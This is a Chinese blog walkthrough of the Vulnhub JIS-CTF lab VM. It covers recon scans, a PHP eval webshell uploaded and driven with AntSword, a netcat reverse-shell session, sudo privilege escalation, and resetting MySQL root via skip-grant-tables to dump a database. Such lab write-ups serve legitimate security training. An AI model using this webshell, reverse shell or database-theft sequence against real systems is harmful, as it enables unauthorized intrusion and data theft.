這是做者的網絡安全自學教程系列，主要是關於安全工具和實踐操做的在線筆記，特分享出來與博友們學習，但願您們喜歡，一塊兒進步。前文分享了SMBv3服務遠程代碼執行漏洞（CVE-2020-0796），攻擊者可能利用此漏洞遠程無需用戶驗證，執行惡意代碼並獲取機器的徹底控制。本文將詳細講解Vulnhub靶機滲透的環境搭建和JIS-CTF題目，採用Nmap、Dirb、中國蟻劍、敏感文件分析、SSH遠程鏈接、Shell提權等獲取5個flag。因爲hack the box速度堪憂，做者選擇了Vulnhub靶場，但願深刻分析來幫助初學者。本文是一篇Web滲透的基礎性文章，但願對您有所幫助。php

做者做爲網絡安全的小白，分享一些自學基礎教程給你們，主要是關於安全工具和實踐操做的在線筆記，但願您們喜歡。同時，更但願您能與我一塊兒操做和進步，後續將深刻學習網絡安全和系統安全知識並分享相關實驗。總之，但願該系列文章對博友有所幫助，寫文不易，大神們不喜勿噴，謝謝！若是文章對您有幫助，將是我創做的最大動力，點贊、評論、私聊都可，一塊兒加油喔~css

1.信息收集
2.First flag
3.Second flag
4.Third flag

登陸分析
上傳一句話木馬
Kali系統安裝中國蟻劍
蟻劍提權

5.Fourth flag
6.Fifth flag
7.sudo提權
8.獲取數據庫數據

五.總結

PS：本文參考了github、安全網站和參考文獻中的文章（詳見參考文獻），並結合本身的經驗和實踐進行撰寫，也推薦你們閱讀參考文獻。html

做者的github資源：
軟件安全：https://github.com/eastmountyxz/Software-Security-Course
其餘工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study

python

聲明：本人堅定反對利用教學方法進行犯罪的行爲，一切犯罪行爲必將受到嚴懲，綠色網絡須要咱們共同維護，更推薦你們瞭解它們背後的原理，更好地進行防禦。mysql

前文欣賞：
[滲透&攻防] 一.從數據庫原理學習網絡攻防及防止SQL注入
 [滲透&攻防] 二.SQL MAP工具從零解讀數據庫及基礎用法
 [滲透&攻防] 三.數據庫之差別備份及Caidao利器
 [滲透&攻防] 四.詳解MySQL數據庫攻防及Fiddler神器分析數據包

git

一.Vulnhub簡介

Vulnhub是一個提供各類漏洞環境的靶場，每一個靶場有對應的目標和難度，挑戰者經過網絡闖入系統獲取root權限和查看flag。Vulnhub中包含了各類各樣的鏡像，能夠下載到本身的主機上練習，其大部分的環境是要用VMware或者VirtualBox打開運行的。github

做者看了Vulnhub的題目，是一個很是棒的Web滲透靶場，每一個靶機都是很酷的一個遊戲，須要找到全部的flag和提權，而Hack the box速度堪憂。爲了讓更多朋友瞭解Web滲透基礎知識，做者接下來會陸續分享該系列20篇文章，儘可能選擇技術含量較高的靶場，結合技術點進行講解，但願大家喜歡~web

官方網址：https://www.vulnhub.com正則表達式

該網站包含了不少靶場題目，每一個靶場有對應的鏡像下載地址、描述和難度等級等。好比「Me and My Girlfriend」以下圖所示：
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

二.JIS-CTF題目描述

靶場題目：JIS-CTF: VulnUpload
靶場地址：https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
難度描述：包含5個Flag，初級難度，查找全部Flag平均須要1.5小時
靶場做者：Mohammad Khreesha
靶場描述：Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.
下載地址：
Download (Torrent)：https://download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova.torrent
Download (Mirror)：https://download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova

打開網址顯示的內容以下圖所示，咱們獲取虛擬機格式的鏡像，而後進行環境配置。

描述中顯示「Only working with VirtualBox」，只能工做在VirtualBox中工做，但做者是在VMware虛擬機中完成的實驗。讀者結合自身環境進行滲透測試。

三.Vulnhub環境配置

該部分推薦i春秋F0rmat老師的文章：https://bbs.ichunqiu.com/thread-39761-1-5.html

第一步，下載資源
建議採用迅雷打開下載JIS-CTF-VulnUpload-CTF01.OVA文件。

下載完成以後以下圖所示，能夠看到一個OVA後綴的文件。

第二步，打開VMware虛擬機安裝靶場
找到咱們剛纔下載的文件，導入虛擬機。

選擇存放的位置，而後點擊導入。

若是出現未經過OVF規範一致性或虛擬硬件合規性檢查，請單擊「重試」導入。在編程或Web滲透過程當中，咱們會遇到各類問題和錯誤，須要學會谷歌和百度獨立解決，這也是對你能力的一種提高。

第三步，導入完成以後，設置NAT網絡模式，內存設置爲2G，硬盤設置爲32GB

第四步，點擊開啓虛擬機及配置過程
到開機頁面選擇第二個Ubuntu的高級選項，若是啓動網絡正常的話能夠直接開機，若是網絡不正常能夠按下面步驟操做。

進入高級選項，再次選擇第二個Linux內核版本的恢復模式回車。

等待系統啓動完畢後，看到這個頁面，咱們繼續回車進入。

回車後會彈出選擇界面，咱們選擇root一行回車，接着再次回車進入命令行模式。

第五步，輸入「mount -o rw,remount / 」命令，再配置網絡問卷，不然後面可能沒法保存網絡配置文件

當Linux系統沒法啓動時，一般須要進入單用戶模式修改一些配置文件，或調整一些參數方可啓動。可是在進入單用戶模式後，咱們的文件系統是隻讀模式，沒法進行修改，那麼這個時候就須要用到一條命令「mount –o remount,rw /」。這個命令讓咱們的 / 路徑文件系統的可讀模式能自由修改。

mount -o rw,remount /

接着輸入命令查看網卡：

ifconfig -a

做者的是ens33，而後繼續輸入命令修改網絡配置文件。

vi /etc/network/interfaces

輸入I修改模式，以下圖所示。

修改這兩個地方，改爲你的網卡名稱，而後輸入「:wq」保存。

最後輸入reboot重啓便可。

運行結果以下圖所示，我一直登陸不進去（不知道用戶名和密碼）。最初覺得是要求用VirtualBox虛擬機的緣由，後來反應過來，此時彷佛Kali上場開始滲透了。

四.Vulnhub靶機滲透詳解

1.信息收集

首先是信息收集一波，任何網站或Web都須要進行一波掃描和分析。

第一步，掃描網卡名稱

netdiscover -i

第二步，調用Nmap探測目標主機IP

nmap -sn 192.168.44.0/24

因爲在同一個網段，因此和主機IP地址近視，掃描結果以下圖所示，靶場IP爲192.168.44.143。

第三步，調用Nmap探測靶機的開放端口信息

nmap -A 192.168.44.143
22端口：SSH遠程鏈接
80端口：HTTP網站協議

第四步，利用dirb掃描80端口的目錄文件，敏感文件分析很是重要

dirb http://192.168.44.143

相關目錄：

http://192.168.44.143/admin_area/
http://192.168.44.143/assets/
http://192.168.44.143/css/
http://192.168.44.143/flag/
http://192.168.44.143/index.php
http://192.168.44.143/js/
http://192.168.44.143/robots.txt
http://192.168.44.143/flag/index.html
http://192.168.44.143/admin_area/index.ph

第五步，調用whatweb查看環境

whatweb 192.168.44.143/login.php

第六步，敏感文件分析

登錄界面：
192.168.44.143/index.php、192.168.44.143/login.php

系統信息：發現目錄瀏覽漏洞，以及apache版本信息
192.168.44.143/assets/

robots.txt文件發現目錄泄露，其中flag文件夾應該有問題
192.168.44.143/robots.txt

作到這裏，信息掃描步驟基本介紹，接下來開始靶機滲透。

2.First flag

咱們從敏感文件robots.txt中獲取目錄信息，查看內容以下圖所示：

接着咱們發現一個敏感的關鍵詞flag，輸入目標地址：192.168.44.143/flag/，第一個flag浮出水面，比較基礎，是敏感文件和目錄相關。

The 1st flag is : {8734509128730458630012095}

3.Second flag

在地址欄中輸入：http://192.168.44.143/admin_area/，顯示以下圖所示：

右鍵查看源碼獲得第二個flag，也是比較簡單的知識點。
The 2nd flag is : {7412574125871236547895214}

與第二個flag同時出現的還有一個帳號和密碼，說明接下來咱們須要利用這個帳號信息。

<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!-- username : admin password : 3v1l_H@ck3r The 2nd flag is : {7412574125871236547895214} -->
</body>
</html>

4.Third flag

登陸分析

咱們以前打開了登陸頁面，但沒有帳號和密碼。這裏是否能用上面的帳號和密碼呢？接着咱們進行了登陸嘗試，返回頁面是一個文件上傳。

http://192.168.44.143/login.php
username : admin
password : 3v1l_H@ck3r

上傳一句話木馬

登陸以後是一個上傳頁面，咱們嘗試上傳一句話木馬。

<?php @eval($_POST["eastmount"]); ?>

因爲該網站採用PHP編寫，一句話木馬以下所示，咱們在Kali瀏覽器中打開並上傳。

上傳文件成功。

接下來咱們用要蟻劍來鏈接。

http://192.168.44.143/uploaded_files/shell.php

Kali系統安裝中國蟻劍

接着咱們須要使用中國蟻劍來提取Webshell。蟻劍怎麼在Kali下安裝和使用呢？中國蟻劍推薦你們閱讀以下文章，它是很是強大的一款滲透工具。

第一步，下載中國蟻劍可使用git命令，也能夠直接從github中下載。

git clone https://github.com/antoor/antSword.git
cd antSword

做者從官網下載對應的Linux版本。

第二步，打開Kali終端找到你下載的中國蟻劍壓縮包並解壓。

unzip AntSword-Loader-v4.0.3-linux-x64.zip

解壓顯示以下圖所示：

第三步，進入中國蟻劍壓縮包並打開蟻劍。

./AntSword

蟻劍打開以下圖所示：

第四步，建立一個空文件夾（用全英文名字）。

而後點擊蟻劍「初始化」按鈕，找到你新建的文件夾，並選擇它進行安裝。

執行結束以後，「./AntSword」會出現這個界面，說明安裝成功。

蟻劍提權

第一步，利用前面上傳的一句話木馬。

<?php @eval($_POST['eastmount']);?>

第二步，運行蟻劍，右鍵單擊「添加數據」，輸入URL地址，鏈接密碼以及編碼設置。PHP語言推薦編輯器使用chr加密。

URL：http://192.168.44.143/uploaded_files/shell.php
密碼：eastmount

接着整個後臺顯示出來，以下圖所示，是否是感覺到了蟻劍的強大。

第三步，右鍵文件管理查看webshell目錄

找到/var/www/html/目錄下，看到hint.txt和flag.txt文件。

直接打開hint.txt文件，咱們看到了第三個flag和用戶名technawi，該用戶名又能作什麼呢？

try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉

The 3rd flag is : {7645110034526579012345670}

注意，這裏若是您對信息比較敏感，可能會經過直接訪問hint.txt獲得第三個flag和用戶technawi。但更推薦你們嘗試中國蟻劍和一句話木馬的滲透方法。

第四步，gobuster目錄掃描
注意，hint.txt文件是可以直接訪問的，但flag.txt文件卻沒法訪問。咱們補充一個目錄掃描知識點，使用gobuster依次掃各目錄下的txt文件。robots.txt和hint.txt目錄爲200，表示能直接訪問，其餘目錄均不能直接訪問，flag.txt提示403。

/robots.txt (Status: 200)
/hint.txt (Status: 200)

root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.44.143 -t 100 -x txt
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/flag (Status: 301)
/flag.txt (Status: 403)
/robots.txt (Status: 200)
/uploaded_files (Status: 301)
/hint.txt (Status: 200)
/server-status (Status: 403)

那怎麼才能獲取flag.txt內容呢？此時你須要想到用戶權限的限制和提取處理。

最後補充另外一種提權方法，上傳php-reverse-shell反彈shell到kali攻擊機獲得shell。

root@redwand:~# rlwrap nc -lvp 6666
listening on [any] 6666 ...
192.168.0.149: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.149] 56148
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:10 up 52 min,  0 users,  load average: 0.00, 2.25, 3.94
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Jordaninfosec-CTF01:/$

5.Fourth flag

剛纔在第三個flag提示咱們「try to find user technawi password to read the flag.txt file, you can find it in a hidden file 」，表示須要用technawi讀取flag.txt文件，咱們能夠在隱藏文件中找到用戶的信息。那怎麼去實現呢？

第一步，咱們在蟻劍中啓動shell的命令行模式，命令「2>/dev/null」表示過濾掉相似沒有權限的信息。

find / -user ‘technawi’ 2>/dev/null

咱們看到了一個特殊的文件/etc/mysql/conf.d/credentials.txt ，嘗試去讀一下里面的信息，獲得flag。

(www-data:/var/www/html) $ find / -user 'technawi' 2>/dev/null
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi
/home/technawi/.cache
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
(www-data:/var/www/html) $ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
(www-data:/var/www/html) $

獲取第四個Flag和technawi用戶對應的密碼。

The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor

6.Fifth flag

若是直接讀取flag.txt文件，顯示爲空，須要對應的用戶和權限。

接着咱們採用SSH鏈接，帳號和密碼爲第4個flag獲取的值。

username : technawi
password : 3vilH@ksor
ssh technawi@192.168.44.143

找到登錄用戶technawi，而後去讀取剛纔flag.txt文件，獲得最後的flag。

cat /var/www/html/flag.txt
The 5th flag is : {5473215946785213456975249}

7.sudo提權

在Web滲透中，提權和數據庫獲取也是很是重要的知識點。儘管Vulnhub是滲透靶場，但獲取flag並非咱們的惟一目標，提權也頗有意思。前面咱們在home目錄下發現 .sudo_as_admin_successful 文件，表示須要使用sudo提權。

root權限能夠直接使用sudo su -得到

首先咱們使用sudo -l看看sudo權限。

顯示「ALL」說明technawi能夠用本身的密碼切換爲 root 用戶，輸入「sudo su root」命令，密碼爲3vilH@ksor。權限成功從technawi提高爲root。

8.獲取數據庫數據

一樣數據庫操做也很是有意思，咱們嘗試獲取mysql數據庫內容。

核心步驟爲：登陸root權限，新建目錄並使用命令跳過輸入密碼過程

mkdir -p /var/run/mysqld
chown -R mysql:mysql /var/run/mysqld
mysqld_safe --skip-grant-tables &

technawi@Jordaninfosec-CTF01:/var/www$ sudo su root
root@Jordaninfosec-CTF01:/var/www# whoami
root
root@Jordaninfosec-CTF01:/var/www# ls
html
root@Jordaninfosec-CTF01:/var/www# mkdir -p /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# chown -R mysql:mysql /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# mysqld_safe --skip-grant-tables &
[1] 1910
root@Jordaninfosec-CTF01:/var/www# 2020-04-10T06:31:09.933846Z mysqld_safe Logging to syslog.
2020-04-10T06:31:09.936319Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-04-10T06:31:09.941145Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-04-10T06:31:09.959551Z mysqld_safe A mysqld process already exists

輸出結果以下圖所示：

接着新開一個終端mysql -uroot無密碼登錄便可，但做者老是報錯。

哎！本身仍是太弱了，最後該部分補充Redwand老師的成功代碼。
[VulnHub] JIS-CTF - redwand

root@Jordaninfosec-CTF01:/tmp# mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

查看數據庫以下：

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)

查看mysql.user表以下：

mysql> select host,user,authentication_string,plugin from user;
+-----------+------------------+-------------------------------------------+-----------------------+
| host      | user             | authentication_string                     | plugin                |
+-----------+------------------+-------------------------------------------+-----------------------+
| localhost | root             | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password |
| localhost | mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | mysql_native_password |
| localhost | debian-sys-maint | *C46C96C2990814041379A76A744EE3E5026A0D64 | mysql_native_password |
+-----------+------------------+-------------------------------------------+-----------------------+

更新root密碼爲123456以下：

mysql> update user set authentication_string=password("123456") where user="root";
Query OK, 0 rows affected, 1 warning (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 1
mysql>flush privileges;

mysqldump導出須要的數據庫，完成mysql脫褲。

root@Jordaninfosec-CTF01:/tmp# mysqldump -uroot -p sys > sys.sql
Enter password:

五.總結

寫道這裏，這篇文章講解完畢，後續會更深刻的分享。文章內容包括：

netdiscover 用於發現目標ip
nmap進行端口掃描
dirb進行目錄掃描
敏感文件獲取及分析
php木馬生成和蟻劍工具
ssh遠程鏈接
sudo提權
數據庫脫褲

但願這系列文章對您有所幫助，真的感受本身技術好菜，要學的知識好多。轉眼4月份到來，這是第65篇原創的安全系列文章，從網絡安全到系統安全，從木馬病毒到後門劫持，從惡意代碼到溯源分析，從滲透工具到二進制工具，還有Python安全、頂會論文、黑客比賽和漏洞分享。未知攻焉知防，人生漫漫其路遠兮，做爲初學者，本身真是爬着前行；同時學術論文得深刻了，加油！感謝不少人的幫助，繼續爬着，繼續加油！

歡迎你們討論，是否以爲這系列文章幫助到您！任何建議均可以評論告知讀者，共勉。

(By:Eastmount 2020-04-15 晚上10點寫於貴陽 http://blog.csdn.net/eastmount/)

參考文獻：
[1] https://www.vulnhub.com
[2] 教你怎麼用Vulnhub來搭建環境 - i春秋老師F0rmat
[3] [VulnHub] JIS-CTF - redwand
[4] OSCP - JIS-CTF-VulnUpload-CTF01 - 青蛙愛輪滑
[5] JIS-CTF_VulnUpload靶機攻略 - FreeBuf yangyangwithgnu
[6] Vulnhub JIS-CTF-VulnUpload靶機滲透 - A1oe
[7] vulnhub靶場滲透學習-JIS-CTF - Shang176

[網絡安全自學篇] 六十五.Vulnhub靶機滲透之環境搭建及JIS-CTF入門和蟻劍提權示例（一）